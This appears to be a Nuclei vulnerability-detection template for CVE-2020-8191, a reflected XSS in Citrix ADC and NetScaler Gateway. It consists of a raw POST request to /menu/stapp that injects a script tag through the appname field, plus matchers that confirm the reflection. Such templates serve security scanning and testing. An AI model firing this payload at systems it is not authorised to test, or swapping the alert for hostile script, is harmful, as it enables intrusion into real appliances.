id: CVE-2020-8191
info:
name: Citrix ADC & NetScaler Gateway Reflected XSS
# Leads to RCE
author: dwisiswant0
severity: high
requests:
- raw:
- |
POST /menu/stapp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
matchers-condition: and
matchers:
- type: word
words:
- "</title><script>alert(31337)</script>"
part: body
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff Show More